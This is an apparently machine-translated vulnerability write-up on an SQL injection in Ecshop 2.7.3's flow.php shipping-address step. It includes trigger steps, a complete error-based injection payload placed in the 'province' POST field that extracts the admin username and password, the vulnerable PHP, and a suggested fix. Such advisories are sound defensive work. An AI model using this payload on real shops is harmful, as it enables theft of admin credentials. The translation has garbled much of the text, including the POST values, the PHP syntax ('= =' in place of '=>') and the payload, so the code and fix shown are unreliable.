Catalog
1 . Vulnerability Description 2 . Vulnerability trigger Condition 3 . Vulnerability Impact Range 4 . Vulnerability Code Analysis 5 . Defense Methods 6. Defensive thinking
1. Vulnerability description
Ecshop Delivery Address Page page does not verify the validity of the regional parameters, there is a SQL injection vulnerability, attackers can use Firefox tamper data and other plugins to modify the post data submitted to the shipping Address page, resulting in unauthorized database operations or even execute arbitrary code
Relevant Link:
http://sebug.net/vuldb/ssvid-60554
2. Vulnerability Trigger Condition
1To register an account, pick a product into the shopping cart, then fill in the address, telephone, etc.2to add any item to the shopping cart, fill in the Shipping Address page, there is a regional selection3. http//localhost/ecshop2.7.3/flow.php?step=consignee&direct_shopping=1//such as the province to choose Anhui3. Where the post data is as follows country=1&province=3&city=Panax Notoginseng&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&submit=%e9% -%8d%e9% the%Bayi%e8% the%b3%e8%bf% About%e4%b8%aa%e5%9c%b0%e5%9d% the&step=consignee&act=checkout&address_id=province=3use Firefox tamper data to change to localhost province=3') and (select 1 from (SELECT COUNT (*), concat (SELECT (select Concat (User_name,0x7c,password) from Ecs_admin_ User limit 0,1) information_schema.tables limit 0,1), floor (rand (0) *) x from Information_schema.tables Group by X) a ) and 1=1 #4. It will echo the error page.
Relevant Link:
http://www.2cto.com/Article/201212/179861.html
3. Vulnerability Impact Range
4. Vulnerability Code Analysis
/flow.php
ElseIf ($_request['Step'] =='Consignee'){ ... //no effective filtering of post data Else { /** Save consignee information*/$consignee=Array ('address_id'= = Empty ($_post['address_id']) ?0: Intval ($_post['address_id']), 'Consignee'= = Empty ($_post['Consignee']) ?"': Trim ($_post['Consignee']), 'Country'= = Empty ($_post['Country']) ?"': $_post['Country'], 'Province'= = Empty ($_post['Province']) ?"': $_post['Province'], ' City'= = Empty ($_post[' City']) ?"': $_post[' City'], 'District'= = Empty ($_post['District']) ?"': $_post['District'], 'Email'= = Empty ($_post['Email']) ?"': $_post['Email'], 'Address'= = Empty ($_post['Address']) ?"': $_post['Address'], 'ZipCode'= = Empty ($_post['ZipCode']) ?"': Make_semiangle (Trim ($_post['ZipCode'])), 'Tel'= = Empty ($_post['Tel']) ?"': Make_semiangle (Trim ($_post['Tel'])), 'Mobile'= = Empty ($_post['Mobile']) ?"': Make_semiangle (Trim ($_post['Mobile'])), 'sign_building'= = Empty ($_post['sign_building']) ?"': $_post['sign_building'], 'Best_time'= = Empty ($_post['Best_time']) ?"': $_post['Best_time'], ); ..
5. Defense Methods
/flow.php
ElseIf ($_request['Step'] =='Consignee'){ ... Else { /** Save consignee information*/$consignee=Array (/*effective filtering of post data entered by the user*/ 'address_id'= = Empty ($_post['address_id']) ?0: Intval ($_post['address_id']), 'Consignee'= = Empty ($_post['Consignee']) ?"': Compile_str (Trim ($_post['Consignee'])), 'Country'= = Empty ($_post['Country']) ?"': Intval ($_post['Country']), 'Province'= = Empty ($_post['Province']) ?"': Intval ($_post['Province']), ' City'= = Empty ($_post[' City']) ?"': Intval ($_post[' City']), 'District'= = Empty ($_post['District']) ?"': Intval ($_post['District']), /* */ 'Email'= = Empty ($_post['Email']) ?"': Compile_str ($_post['Email']), 'Address'= = Empty ($_post['Address']) ?"': Compile_str ($_post['Address']), 'ZipCode'= = Empty ($_post['ZipCode']) ?"': Compile_str (Make_semiangle (Trim ($_post['ZipCode']))), 'Tel'= = Empty ($_post['Tel']) ?"': Compile_str (Make_semiangle (Trim ($_post['Tel']))), 'Mobile'= = Empty ($_post['Mobile']) ?"': Compile_str (Make_semiangle (Trim ($_post['Mobile']))), 'sign_building'= = Empty ($_post['sign_building']) ?"': Compile_str ($_post['sign_building']), 'Best_time'= = Empty ($_post['Best_time']) ?"': Compile_str ($_post['Best_time']), ); ..
6. Defensive Thinking
Copyright (c) Littlehann All rights reserved
ecshop/flow.php SQL Injection Vul